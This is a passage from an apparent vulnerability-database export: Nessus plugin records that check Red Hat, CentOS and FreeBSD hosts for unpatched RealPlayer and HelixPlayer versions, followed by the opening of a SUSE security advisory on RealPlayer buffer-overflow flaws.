value:\"http://rhn.redhat.com/errata/RHSA-2006-0257.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected RealPlayer and / or realplayer packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:RealPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"realplayer-10.0.7-0.rhel3.2\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"RealPlayer-10.0.7-2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:32", "description": "iDefense Reports :\n\nRemote exploitation of a heap-based buffer overflow in RealNetwork Inc's RealPlayer could allow the execution of arbitrary code in the context of the currently logged in user.\n\nIn order to exploit this vulnerability, an attacker would need to entice a user to follow a link to a malicious server. Once the user visits a website under the control of an attacker, it is possible in a default install of RealPlayer to force a web-browser to use RealPlayer to connect to an arbitrary server, even when it is not the default application for handling those types, by the use of embedded object tags in a webpage. This may allow automated exploitation when the page is viewed.", "cvss3": {}, "published": "2006-05-13T00:00:00", "type": "nessus", "title": "FreeBSD : linux-realplayer -- heap overflow (fe4c84fc-bdb5-11da-b7d4-00123ffe8333)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2922"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-realplayer", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_FE4C84FCBDB511DAB7D400123FFE8333.NASL", "href": "https://www.tenable.com/plugins/nessus/21544", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21544);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-2922\");\n script_xref(name:\"Secunia\", value:\"19358\");\n\n script_name(english:\"FreeBSD : linux-realplayer -- heap overflow (fe4c84fc-bdb5-11da-b7d4-00123ffe8333)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"iDefense Reports :\n\nRemote exploitation of a heap-based buffer overflow in RealNetwork\nInc's RealPlayer could allow the execution of arbitrary code in the\ncontext of the currently logged in user.\n\nIn order to exploit this vulnerability, an attacker would need to\nentice a user to follow a link to a malicious server. Once the user\nvisits a website under the control of an attacker, it is possible in a\ndefault install of RealPlayer to force a web-browser to use RealPlayer\nto connect to an arbitrary server, even when it is not the default\napplication for handling those types, by the use of embedded object\ntags in a webpage. This may allow automated exploitation when the page\nis viewed.\"\n );\n # http://service.real.com/realplayer/security/03162006_player/en/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.real.com/\"\n );\n # http://www.idefense.com/intelligence/vulnerabilities/display.php?id=404\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c3617439\"\n );\n # https://vuxml.freebsd.org/freebsd/fe4c84fc-bdb5-11da-b7d4-00123ffe8333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?963d2fe4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-realplayer>=10.0.1<10.0.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:57:55", "description": "An updated HelixPlayer package that fixes a string format issue is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA format string bug was discovered in the way HelixPlayer processes RealPix (.rp) files. It is possible for a malformed RealPix file to execute arbitrary code as the user running HelixPlayer. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2710 to this issue.\n\nAll users of HelixPlayer are advised to upgrade to this updated package, which contains HelixPlayer version 10.0.6 and is not vulnerable to this issue.", "cvss3": {}, "published": "2007-01-08T00:00:00", "type": "nessus", "title": "CentOS 4 : Helix / Player (CESA-2005:788)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2629", "CVE-2005-2710", "CVE-2005-2922"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:helixplayer", "cpe:/o:centos:centos:4"], "id": "CENTOS_RHSA-2005-788.NASL", "href": "https://www.tenable.com/plugins/nessus/23983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:788 and \n# CentOS Errata and Security Advisory 2005:788 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(23983);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-2629\", \"CVE-2005-2710\", \"CVE-2005-2922\");\n script_xref(name:\"RHSA\", value:\"2005:788\");\n\n script_name(english:\"CentOS 4 : Helix / Player (CESA-2005:788)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated HelixPlayer package that fixes a string format issue is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA format string bug was discovered in the way HelixPlayer processes\nRealPix (.rp) files. It is possible for a malformed RealPix file to\nexecute arbitrary code as the user running HelixPlayer. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2005-2710 to this issue.\n\nAll users of HelixPlayer are advised to upgrade to this updated\npackage, which contains HelixPlayer version 10.0.6 and is not\nvulnerable to this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-September/012207.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d258f2dc\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2005-September/012208.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7cf68a6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected helix and / or player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:HelixPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"HelixPlayer-1.0.6-0.EL4.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"HelixPlayer-1.0.6-0.EL4.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HelixPlayer\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:08", "description": "An updated HelixPlayer package that fixes a string format issue is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA format string bug was discovered in the way HelixPlayer processes RealPix (.rp) files. It is possible for a malformed RealPix file to execute arbitrary code as the user running HelixPlayer. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2710 to this issue.\n\nAll users of HelixPlayer are advised to upgrade to this updated package, which contains HelixPlayer version 10.0.6 and is not vulnerable to this issue.", "cvss3": {}, "published": "2005-10-05T00:00:00", "type": "nessus", "title": "RHEL 4 : HelixPlayer (RHSA-2005:788)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2629", "CVE-2005-2710", "CVE-2005-2922"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:helixplayer", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2005-788.NASL", "href": "https://www.tenable.com/plugins/nessus/19836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:788. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19836);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-2629\", \"CVE-2005-2710\", \"CVE-2005-2922\");\n script_xref(name:\"RHSA\", value:\"2005:788\");\n\n script_name(english:\"RHEL 4 : HelixPlayer (RHSA-2005:788)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated HelixPlayer package that fixes a string format issue is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA format string bug was discovered in the way HelixPlayer processes\nRealPix (.rp) files. It is possible for a malformed RealPix file to\nexecute arbitrary code as the user running HelixPlayer. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2005-2710 to this issue.\n\nAll users of HelixPlayer are advised to upgrade to this updated\npackage, which contains HelixPlayer version 10.0.6 and is not\nvulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2629\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-2922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:788\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected HelixPlayer package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:HelixPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:788\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"HelixPlayer-1.0.6-0.EL4.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HelixPlayer\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:33", "description": "An updated RealPlayer package that fixes a format string bug is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and via streaming.\n\nA format string bug was discovered in the way RealPlayer processes RealPix (.rp) files. It is possible for a malformed RealPix file to execute arbitrary code as the user running RealPlayer. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2710 to this issue.\n\nAll users of RealPlayer are advised to upgrade to this updated package, which contains RealPlayer version 10.0.6 and is not vulnerable to this issue.", "cvss3": {}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 3 / 4 : RealPlayer (RHSA-2005:762)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2629", "CVE-2005-2710", "CVE-2005-2922", "CVE-2005-2969"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:realplayer", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2005-762.NASL", "href": "https://www.tenable.com/plugins/nessus/63829", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:762. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63829);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2005-2629\", \"CVE-2005-2710\", \"CVE-2005-2922\", \"CVE-2005-2969\");\n script_xref(name:\"RHSA\", value:\"2005:762\");\n\n script_name(english:\"RHEL 3 / 4 : RealPlayer (RHSA-2005:762)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated RealPlayer package that fixes a format string bug is now\navailable.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and\nvia streaming.\n\nA format string bug was discovered in the way RealPlayer processes\nRealPix (.rp) files. It is possible for a malformed RealPix file to\nexecute arbitrary code as the user running RealPlayer. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2005-2710 to this issue.\n\nAll users of RealPlayer are advised to upgrade to this updated\npackage, which contains RealPlayer version 10.0.6 and is not\nvulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-2629.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-2710.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-2922.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2005-762.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected RealPlayer and / or realplayer packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:RealPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"realplayer-10.0.6-0.rhel3.2\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"RealPlayer-10.0.6-2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n______________________________________________________________________________\r\n\r\n SUSE Security Announcement\r\n\r\n Package: RealPlayer\r\n Announcement ID: SUSE-SA:2006:018\r\n Date: Thu, 23 Mar 2006 12:00:00 +0000\r\n Affected Products: Novell Linux Desktop 9\r\n SUSE LINUX 10.0\r\n SUSE LINUX 9.3\r\n SUSE LINUX 9.2\r\n Vulnerability Type: remote code execution\r\n Severity (1-10): 8\r\n SUSE Default Package: yes\r\n Cross-References: CVE-2005-2922, CVE-2006-0323\r\n\r\n Content of This Advisory:\r\n 1) Security Vulnerability Resolved:\r\n realplayer security problems\r\n Problem Description\r\n 2) Solution or Work-Around\r\n 3) Special Instructions and Notes\r\n 4) Package Location and Checksums\r\n 5) Pending Vulnerabilities, Solutions, and Work-Arounds:\r\n See SUSE Security Summary Report.\r\n 6) Authenticity Verification and Additional Information\r\n\r\n______________________________________________________________________________\r\n\r\n1) Problem Description and Brief Discussion\r\n\r\n This update fixes the following security problems in Realplayer:\r\n\r\n - Specially crafted SWF files could cause a buffer overflow and\r\n crash RealPlayer (CVE-2006-0323).\r\n\r\n - Specially crafted web sites could cause heap overflow and lead to\r\n executing arbitrary code (CVE-2005-2922). This was already fixed\r\n with the previously released 1.0.6 version, but not announced on\r\n request of Real.\r\n\r\n The advisory for these problems is on this page at Real:\r\n http://service.real.com/realplayer/security/03162006_player/en/\r\n\r\n SUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by\r\n this problem and receive fixed packages.\r\n\r\n If you are still using Realplayer on SUSE Linux 9.1 or SUSE Linux\r\n Desktop 1, we again wish to remind you that the Real player on these\r\n products cannot be updated and recommend to deinstall it.\r\n\r\n2) Solution or Work-Around\r\n\r\n There is no known workaround, please install the update packages.\r\n\r\n3) Special Instructions and Notes\r\n\r\n None.\r\n\r\n4) Package Location and Checksums\r\n\r\n The preferred method for installing security updates is to use the YaST\r\n Online Update (YOU) tool. YOU detects which updates are required and\r\n automatically performs the necessary steps to verify and install them.\r\n Alternatively, download the update packages for your distribution manually\r\n and verify their integrity by the methods listed in Section 6 of this\r\n announcement. Then install the packages using the command\r\n\r\n rpm -Fhv <file.rpm>\r\n\r\n to apply the update, replacing <file.rpm> with the filename of the\r\n downloaded RPM package.\r\n\r\n\r\n x86 Platform:\r\n\r\n SUSE LINUX 10.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm\r\n 